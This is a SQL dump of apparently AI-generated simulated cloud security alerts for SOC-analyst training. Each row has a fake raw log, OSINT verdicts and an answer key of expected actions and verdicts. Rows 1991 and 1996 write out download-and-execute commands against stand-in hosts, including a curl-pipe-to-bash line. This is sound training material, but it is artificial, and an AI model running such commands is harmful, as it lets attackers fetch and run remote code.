(1979, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'An unauthorized user gained admin privileges on Azure IAM, which could allow them to execute further attacks.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:45Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.32\",\"dst_ip\":\"10.0.0.5\",\"username\":\"attacker_user\",\"hostname\":\"azure.portal.com\",\"command_line\":\"az role assignment create --assignee attacker_user --role \'Owner\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.32\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple privilege escalation incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User exists but should not have admin privileges\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee attacker_user --role \'Owner\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to escalate privileges in Azure\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized privilege escalation detected; immediate action required to prevent further malicious activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1980, 'GCP Service Account Hijacking', 'critical', 'GCP SCC', 'Anomalous activity detected from a GCP service account indicating potential hijacking.', 'Account Compromise', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:30Z\",\"event_type\":\"service_account_usage\",\"src_ip\":\"203.0.113.78\",\"dst_ip\":\"10.2.0.15\",\"username\":\"service-account-123\",\"hostname\":\"cloud.google.com\",\"command_line\":\"gcloud auth activate-service-account --key-file=/tmp/key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized service account access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal GCP Audit\",\"verdict\":\"internal\",\"details\":\"Service account with unexpected activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=/tmp/key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized activation of service account\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"account_compromise\",\"analysis_notes\":\"Service account showing signs of compromise; potentially linked to unauthorized access and actions.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1981, 'Prisma Cloud Detects Suspicious Kubernetes Activity', 'high', 'Prisma Cloud', 'Unusual Kubernetes API requests detected suggesting potential compromise of the cluster.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:12Z\",\"event_type\":\"k8s_api_request\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"k8s-admin\",\"hostname\":\"k8s.cluster.local\",\"command_line\":\"kubectl exec -it pod-name -- /bin/sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in Kubernetes API access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"k8s-admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal LDAP\",\"verdict\":\"internal\",\"details\":\"Admin account with suspicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl exec -it pod-name -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command indicates potential lateral movement within the cluster\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Suspicious execution in the Kubernetes environment suggests potential for lateral movement.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1982, 'Wiz Detects Unusual Serverless Function Execution', 'medium', 'Wiz', 'A serverless function was executed with unexpected parameters, indicating potential misuse.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:10Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"172.16.0.10\",\"username\":\"lambda_user\",\"hostname\":\"aws.lambda\",\"command_line\":\"node index.js --input=\'malicious_payload\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for executing serverless functions with malicious intent\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node index.js --input=\'malicious_payload\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution with suspicious parameters\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"Unexpected parameters indicate a potential misuse of serverless functions.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1983, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized access to an S3 bucket was detected from an external IP. Sensitive data may have been exfiltrated.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:12Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data HTTP/1.1\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1247 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized data request to S3 bucket\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"S3 bucket internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The unauthorized access and data exfiltration attempt from an external IP confirms this as a true positive attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1984, 'Azure IAM Privilege Escalation', 'high', 'Azure Defender', 'An IAM user was granted elevated privileges without proper authorization. Potential for unauthorized access to critical resources.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:27Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"52.174.112.10\",\"username\":\"elevated_user\",\"hostname\":\"azure.microsoft.com\",\"command_line\":\"az role assignment create --assignee elevated_user --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"elevated_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account within the organization\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the accessing machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee elevated_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized privilege escalation command\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized role assignment indicates potential privilege escalation, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1985, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Suspicious activity detected involving a GCP service account attempting to access unauthorized resources.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:43Z\",\"event_type\":\"login_attempt\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"35.196.90.23\",\"username\":\"compromised_service_account\",\"hostname\":\"gcp.google.com\",\"command_line\":\"gcloud auth activate-service-account --key-file /path/to/key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous credential stuffing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Service account within the organization\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file /path/to/key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized service account activation\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attempt to hijack a service account with unauthorized access confirms this as a true positive credential attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1986, 'Prisma Cloud Detected Unauthorized Kubernetes Access', 'high', 'Prisma Cloud', 'Unauthorized access to Kubernetes cluster detected from external IP address. Potential risk of container compromise.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:00:05Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.0.2.56\",\"dst_ip\":\"10.0.1.20\",\"username\":\"kube_admin\",\"hostname\":\"kubernetes.local\",\"command_line\":\"kubectl get pods --all-namespaces\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP flagged for suspicious Kubernetes access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Kubernetes cluster internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl get pods --all-namespaces\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized Kubernetes command execution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized command execution on Kubernetes cluster indicates a potential lateral movement attempt, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1987, 'Wiz Detected Serverless Function Misuse', 'medium', 'Wiz', 'Suspicious execution of serverless function detected, possibly indicating misuse for unauthorized data processing.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:19Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.78\",\"dst_ip\":\"10.0.2.30\",\"username\":\"lambda_user\",\"hostname\":\"aws.lambda.com\",\"command_line\":\"node malicious_script.js\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous unauthorized script executions\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected execution of a known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of serverless function\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The execution of a known malicious script on a serverless function indicates potential misuse, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1988, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Suspicious activity detected on an S3 bucket. Data exfiltration attempt using compromised credentials.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"compromised_user\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"GET /sensitive-data/\",\"command_line\":\"aws s3 cp s3://sensitive-data /local/ --recursive\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for data exfiltration attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"aws s3 cp s3://sensitive-data /local/ --recursive\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in unauthorized data transfers\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of compromised credentials and a known malicious IP confirms the data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1989, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'Detected unauthorized increase in IAM permissions for a user account.', 'Privilege Escalation', 'T1068', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"user_privilege_change\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"10.0.0.5\",\"username\":\"elevated_user\",\"hostname\":\"azure-ad\",\"request_body\":\"RoleAssignment\",\"command_line\":\"az role assignment create --assignee elevated_user --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP known for suspicious login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"elevated_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Account previously not used for administrative tasks\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee elevated_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used in privilege escalation incidents\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized role assignment indicates a successful privilege escalation attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1990, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A service account was used to perform activities outside its regular scope, indicating potential hijacking.', 'Credential Access', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:00Z\",\"event_type\":\"service_account_use\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"192.168.2.15\",\"username\":\"service-account-123\",\"hostname\":\"gcp-project\",\"request_body\":\"Accessing restricted resources\",\"command_line\":\"gcloud compute instances list --filter=\'name~\'restricted-instance\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous hijacking incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account used outside regular patterns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud compute instances list --filter=\'name~\'restricted-instance\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of unauthorized resource access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized activities performed by the service account indicate hijacking.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1991, 'Prisma Cloud Serverless Function Anomaly', 'high', 'Prisma Cloud', 'Anomalous execution detected in a serverless function. Possible code injection or misuse.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"10.0.1.1\",\"username\":\"lambda_function\",\"hostname\":\"prisma-cloud\",\"request_body\":\"Execution of unauthorized script\",\"command_line\":\"node -e \\\"require(\'child_process\').exec(\'wget http://malicious-site.com/payload\');\\\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node -e \\\"require(\'child_process\').exec(\'wget http://malicious-site.com/payload\');\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution indicative of code injection\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a script to download a payload confirms a code injection attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1992, 'Wiz Kubernetes Unauthorized Access Attempt', 'medium', 'Wiz', 'Detected an unauthorized access attempt to a Kubernetes cluster. Possible exploitation of misconfigured controls.', 'Lateral Movement', 'T1021', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:25:00Z\",\"event_type\":\"cluster_access\",\"src_ip\":\"198.51.100.88\",\"dst_ip\":\"172.16.0.2\",\"username\":\"k8s_admin\",\"hostname\":\"wiz-k8s-cluster\",\"request_body\":\"kubectl get pods\",\"command_line\":\"kubectl exec --stdin --tty pod_name -- /bin/bash\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in unauthorized Kubernetes access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec --stdin --tty pod_name -- /bin/bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Command used in lateral movement attempts within clusters\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized kubectl command execution suggests an attempt to move laterally within the cluster.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1993, 'AWS GuardDuty: S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unauthorized access to an S3 bucket was detected from an external IP address. Sensitive data exfiltration is suspected.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"s3_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.15\",\"username\":\"aws_user123\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data/file.txt HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address of victim machine\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"aws_user123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account involved in multiple unauthorized access events\"}},{\"id\":\"artifact_4\",\"type\":\"payload\",\"value\":\"GET /sensitive-data/file.txt HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Data exfiltration attempt via unauthorized S3 bucket access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert is confirmed as true positive due to unauthorized access and data retrieval from an external IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1994, 'Azure Defender: IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'Potential privilege escalation detected where a user attempted to assign higher privileges using a compromised account.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:00Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"azure.portal.com\",\"request_body\":\"POST /api/assignRole HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in several privilege escalation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address of victim Azure instance\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for anomalous activity\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Confirmed privilege escalation attempt due to unauthorized role assignment from a known malicious IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1995, 'GCP SCC: Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A GCP service account was compromised, leading to unauthorized API calls and potential data theft.', 'Credential Attack', 'T1550', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"api_call\",\"src_ip\":\"192.0.2.75\",\"dst_ip\":\"10.1.1.10\",\"username\":\"service_account_1\",\"hostname\":\"gcp.googleapis.com\",\"request_body\":\"POST /v1/projects/myproject/apis HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous service account hijacking incidents\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address of affected GCP instance\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"service_account_1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Service account involved in unauthorized API calls\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"True positive due to unauthorized API access from a known malicious IP using a compromised service account.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1996, 'Prisma Cloud: Kubernetes Cluster Compromise', 'high', 'Prisma Cloud', 'Suspicious shell commands executed on a Kubernetes node indicating potential compromise.', 'Lateral Movement', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.20.10.5\",\"dst_ip\":\"\",\"username\":\"kube_user\",\"hostname\":\"k8s-node-1\",\"request_body\":\"\",\"command_line\":\"curl -s http://malicious-domain.com/payload.sh | bash\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.20.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal Kubernetes node IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl -s http://malicious-domain.com/payload.sh | bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command attempting to download and execute a malicious script\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"True positive due to execution of a known malicious command on a Kubernetes node.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
